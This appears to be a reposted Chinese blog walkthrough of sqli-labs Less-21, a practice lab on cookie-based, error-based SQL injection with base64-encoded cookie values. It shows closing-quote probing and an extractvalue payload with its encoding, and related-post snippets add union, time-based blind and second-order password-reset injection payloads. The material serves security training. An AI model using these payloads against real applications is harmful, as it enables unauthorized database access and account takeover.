SQLI DUMB SERIES-21

最新推荐文章于 2024-05-24 11:20:39 发布

转载最新推荐文章于 2024-05-24 11:20:39 发布 · 271 阅读

0 ·

CC 4.0 BY-SA版权

原文链接：http://www.cnblogs.com/momoli/p/10706303.html

本文详细介绍了基于错误的复杂字符型Cookie注入攻击方法，包括利用BASE64编码进行闭合和payload构造，以及如何通过burp抓包进行实战演练。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

Cookie Injection- Error Based- complex - string ( 基于错误的复杂的字符型Cookie注入)

（1）登录成功后有以下页面：

其中红圈内的字符为admin的BASED64编码后的字符。

(2)用burp抓包，再刷新浏览器。

寻找闭合方式：明文：admin' --+ based64编码：YWRtaW4nICAtLSs=

闭合方式为' )

(3)开始报错注入，需要将payload用based63编码输入。例如：爆表名

admin') and extractvalue(1,concat(0x7e,(select database())))and ('

编码：

YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpKSkpYW5kICgn

转载于:https://www.cnblogs.com/momoli/p/10706303.html

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

weixin_34175509

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

sqli-labs 21-28

记录一些有用的东西

12-12

478

Less-21 1.直接用我们知道的用户名密码都为：admin的进行尝试，发现： 2.发现Cookie为：uname = YWRtaW4=说明对其进行了base64编码，那就编码看看：在线编码解码 YWRtaW4=就是admin，确实是base64编码，那就是说构造的语句也要进行base64编码。还是在Cookie中构造：uname=admin' and extractvalue(1,concat('~',(select database()))) #编码后 uname=YWRtaW4nIGFuZCB

SQLI DUMB SERIES-1-2

qq_43613144的博客

07-20

2666

安装了SQLI DUMB的题库这些都是为了了解sql注入的方式，碰到的题目就是这样的题去找flag。现在就是去探索方法第一题 1.提示输入ID，提示也有get，所以试试?id=1 再试试后面加’ 然后发现 ’ 没有被过滤，然后可以进行回显成功回显失败、所以说此处存在注入点 2.用order by判断列数第三栏位存在，第四栏位不存在，所以说这个表只有三列 3.爆库联合查询注...

参与评论您还未登录，请先登录后发表或查看评论

【SQL注入】靶场SQLI DUMB SERIES-24通过二次注入重置用户密码

开水的博客

02-21

358

先使用已知信息admin/admin登录进去查下题，发现可以修改密码。第三步，进入修改密码界面，随机输入一个旧密码，然后将需要重置的密码。第一步，注册一个新用户：admin’#/123456。，因此注释符#后面的内容都被注释，导致我们不需要知道。第二步，登录刚刚注册的admin’#用户。用户的密码，即可重置。

sqli-labs/Less-24

m0_71299382的博客

11-19

327

sqli-labs第二十四关

sqli-labs进阶篇 25_28关

Lucky小小吴的小屋

01-30

1141

一、如何判断单/双引号注入？ ?id=1' 报错了，一定是单引号注入 -- 解析下 ①如果是双引号注入："XXX" 输入：?id=1" or 1=1 执行："1" or 1=1 " 结果：报错 ②如果是单引号注入：'XXX' 输入：?id=1" or 1=1 执行：'?id=1" or 1=1' 结果：id=1，执行成功二、如何判断闭合注入？以单引号为例三、怎么绕过一些字符？一般是使用3种方法进行绕过，分别是URL编码、大小写、重写（1）URL编码的常见字符 %09

SQLI-labs-第二十四关

最新发布

weixin_54055099的博客

05-24

889

Sqli-labs第24关，二次注入

SQLI DUMB SERIES-1

weixin_33738578的博客

03-01

3077

less-1 （1）可以看到提示输入ID，而且less-1题目也有提到GET，因此试试以下操作： http://127.0.0.1/sqli-labs-master/Less-1/?id=1 结果： http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27 结果：　　现在可知，“ ' ”并没有被过滤，因此...

sqli dumb series-1

03-16

sqli dumb series-1是一个SQL注入漏洞测试平台，用于测试网站是否存在SQL注入漏洞。它提供了一系列的测试用例，用户可以通过输入不同的参数来测试网站是否存在SQL注入漏洞。这个平台可以帮助网站管理员及时发现并...

SQL DUMB Series-3 & 4 通关过程分享（sql注入学习DAY2）

deja_vuDM的博客

06-10

1337

单引号加括号，双引号加括号

SQLi Labs实验指导书

12-23

sqlilabs, 渗透测试，网络攻防，数据库安全， mysql，sql

sqli dumb series-25 (绕过AND OR 过滤)

CHUNJIUJUN的博客

07-30

251

进入网页发现正中间写了or和and被过滤了首先判断不是数字型，为字符型注入这里记录一下 and 和 or 的过滤方式： and --> anandd or --> oorr

【渗透测试】sqli-labs闯关(18-24)

qq_43168364的博客

08-22

1007

第十八关：user-agent单引号字符型注入点方法：在user-agent上进行xpath报错注入这一关我们输入用户名和密码之后给我们回显除了user-agent的信息，我们猜想注入应当是发生在user-agent上的。我们首先看看源代码。果然这里把user-agent插入了数据库，我们只需要闭合$uagent前后的单引号然后写上注入语句即可。我们首先得到表名，语法：' and ext......

SQLI DUMB SERIES-3

imomoe的博客

09-23

1196

?id=1’) 构造闭合 ?id=1’) --+ 注释后面内容 ?id=1’) order by 4–+ 4报错 3不报错故有3列 ?id=-1’) union all select 1,2,3 from users–+ 在将?id=1改为?id=-1 使其为逻辑不正确值不显示输出使得输出位输出后面的语句 ?id=-1’) union all select 1,2,table_name...

SQLI DUMB SERIES-5

weixin_34179762的博客

03-12

654

less5 （1）输入单引号，回显错误，说明存在注入点。输入的Id被一对单引号所包围，可以闭合单引号（2）输入正常时：?id=1 说明没有显示位，因此不能使用联合查询了；可以使用报错注入,有两种方式（3）双注入查询参考资料：http://www.2cto.com/article/201303/192718.html 简单的说，使用聚合函数进行双注入查询时...

SQLI DUMB SERIES-9

imomoe的博客

09-24

659

此处没有回显所以通过别的函数来检测闭合是否构造 sleep() 如果执行沉睡4秒 ?id=1' and sleep(4)--+ 页面延迟输出所以sleep被执行所以构造闭合成功猜库名 ?id=1' and if(ascii(substr(database(),1,1))=115,sleep(2),0)--+ 猜表名 ?id=1' and if ((ascii(su...

SQLI DUMB SERIES-12

weixin_33946020的博客

04-14

258

（1）检测闭合方式:在username上输入" admin" " 说明输入的username后还有双引号和括号方法一：（2）通过其他途径知道用户名即可。如输入" admin")# " 方法二：（3）构造即可闭合又可报错的语句，在username处输入爆库payload： admin" and extractvalue(1,concat(0x7e,(select...

sqli-labs 21——40关攻略

weixin_45880717的博客

02-02

1200

Less-21 基于错误的复杂的字符型Cookie注入 base64编码，单引号，报错型，cookie型注入。本关和less-20相似，只是cookie的uname值经过base64编码了。登录后页面：圈出来的地方显然是base64加密过的，解码得到：admin，就是刚才登陆的uname，所以猜测：本题在cookie处加密了字符串，查看php文件确实如此，所以只需要上传paylaod的时...